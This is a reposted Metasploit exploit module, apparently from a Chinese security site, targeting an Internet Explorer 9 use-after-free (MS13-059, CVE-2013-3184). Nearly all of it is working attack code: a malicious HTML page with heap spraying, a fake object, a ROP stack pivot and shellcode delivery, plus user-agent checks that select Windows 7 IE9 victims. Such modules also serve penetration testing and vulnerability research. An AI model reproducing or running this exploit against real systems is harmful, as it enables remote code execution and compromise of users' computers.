首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free
来源:metasploit.com 作者:sinn3r 发布时间:2013-09-10  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##
  
require 'msf/core'
  
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb
  
  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS13-059 Microsoft Internet Explorer CFlatMarkupPointer Use-After-Free",
      'Description'    => %q{
        This is a memory corruption bug found in Microsoft Internet Explorer. On IE 9,
        it seems to only affect certain releases of mshtml.dll. For example: This module
        can be used against version 9.0.8112.16446, but not for 9.0.8112.16421. IE 8
        requires a different way to trigger the vulnerability, but not currently covered
        by this module.
  
        The issue is specific to the browser's IE7 document compatibility, which can be
        defined in X-UA-Compatible, and the content editable mode must be enabled. An
        "onmove" event handler is also necessary to be able to trigger the bug, and the
        event will be run twice before the crash. The first time is due to the position
        change of the body element, which is also when a MSHTML!CFlatMarkupPointer::`vftable'
        object is created during a "SelectAll" command, and this object will be used later
        on for the crash. The second onmove event seems to be triggered by a InsertButton
        (or Insert-whatever) command, which is also responsible for the free of object
        CFlatMarkupPointer during page rendering. The EnsureRecalcNotify() function will
        then still return an invalid reference to CFlatMarkupPointer (stored in EBX), and
        then passes this on to the next functions (GetLineInfo -> QIClassID).  When this
        reference arrives in function QIClassID, an access violation finally occurs when
        the function is trying to call QueryInterface() with the bad reference, and this
        results a crash. Successful control of the freed memory may leverage arbitrary code
        execution under the context of the user.
  
        Note: It is also possible to see a different object being freed and used, doesn't
        always have to be CFlatMarkupPointer.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'corelanc0d3r'# Vuln discovery, PoC
          'sinn3r'         # Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2013-3184' ],
          [ 'OSVDB', '96182'   ],
          [ 'MSB', 'MS13-059'  ],
          [ 'BID', '61668'     ],
          [ 'URL', 'http://zerodayinitiative.com/advisories/ZDI-13-194/' ],
          [ 'URL', 'http://zerodayinitiative.com/advisories/ZDI-13-195/' ]
        ],
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Vulnerable IE9 tested: 9.0.8112.16446
          [ 'Automatic', {} ],
          [ 'IE 9 on Windows 7 SP1 (mshtml 9.0.8112.16446)', {} ]
        ],
      'Payload'        =>
        {
          'BadChars'        => "\x00",
          'StackAdjustment' => -3500
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Privileged'     => false,
      'DisclosureDate' => "Jun 27 2013",
      'DefaultTarget'  => 0))
  end
  
  def rnd_dword
    rand_text_alpha(4).unpack("V").first
  end
  
  def get_fake_obj
    # edx,dword ptr [eax]
    # ...
    # call edx
    obj  = [0x20302020].pack("V*"# EAX points to this (Target spray 0x20302020)
    obj << [rnd_dword].pack("V*")
    obj << [rnd_dword].pack("V*")
    obj << [rnd_dword].pack("V*")
    obj << [rnd_dword].pack("V*")
  
    return obj
  end
  
  # Target spray 0x20302020
  # ESI is our fake obj, with [esi]=0x20302020, [esi+4]=0x42424242, so on
  # eax=20302020 ebx=80004002 ecx=0250d890 edx=cccccccc esi=03909b68 edi=0250d8cc
  # eip=cccccccc esp=0250d87c ebp=0250d8a8 iopl=0         nv up ei ng nz na po cy
  # cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010283
  # cccccccc ??              ???
  def get_payload
    code  = ''
    code << "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
    code << "\x61\x9d"                 # popad; popfd
    code << payload.encoded
  
    stack_pivot = [
      0x7c342643, # xchg eax, esp; pop edi; add [eax], al, pop ecx; ret
      0x0c0c0c0c
    ].pack("V*")
  
    p = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
  
    return p
  end
  
  def is_win7_ie9?(agent)
    (agent =~ /MSIE 9/ and agent =~ /Windows NT 6\.1/)
  end
  
  # The meta-refresh seems very necessary to make the object overwrite more reliable.
  # Without it, it only gets about 50/50
  def get_html(cli, req)
    js_fake_obj = ::Rex::Text.to_unescape(get_fake_obj, ::Rex::Arch.endian(target.arch))
    js_payload  = ::Rex::Text.to_unescape(get_payload, ::Rex::Arch.endian(target.arch))
  
    html = %Q|
    <html>
    <meta http-equiv="X-UA-Compatible" content="IE=7"/>
    <meta http-equiv="refresh" content="2"/>
    <head>
    <script language='javascript'>
    #{js_property_spray}
  
    var fake_obj = unescape("#{js_fake_obj}");
    var s = unescape("#{js_payload}");
  
    sprayHeap({shellcode:s});
  
    function setupPage() {
      document.body.style.position = 'absolute';
      document.body.contentEditable = 'true';
      document.body.style.right = '1';
    }
  
    function hitMe() {
      document.execCommand('SelectAll');
      document.execCommand('InsertButton');
      sprayHeap({shellcode:fake_obj, heapBlockSize:0x10});
      document.body.innerHTML = '#{Rex::Text.rand_text_alpha(1)}';
    }
    </script>
    </head>
    <body onload="setupPage()" onmove="hitMe()" />
    </html>
    |
  
    html.gsub(/^\t\t/, '')
  end
  
  def on_request_uri(cli, request)
    if is_win7_ie9?(request.headers['User-Agent'])
      print_status("Sending exploit...")
      send_response(cli, get_html(cli, request), {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})
    else
      print_error("Not a suitable target: #{request.headers['User-Agent']}")
      send_not_found(cli)
    end
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GOMPlayer 2.2.53.5169 (.wav) -
·HP LoadRunner lrFileIOService
·jetAudio 8.0.16.2000 Plus VX -
·Wiz 5.0.3 User Mode Write Acce
·KingView 6.53 - Insecure Activ
·PotPlayer 1.5.39036 (.wav) - C
·KingView 6.53 - ActiveX Remote
·Oracle Java lookUpByteBI - Hea
·IKE and AuthIP IPsec Keyring M
·GreenBrowser 6.4.0515 - Heap O
·OSX <= 10.8.4 - Local Root Pri
·PWStore 2010.8.30.0 Cross Site
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved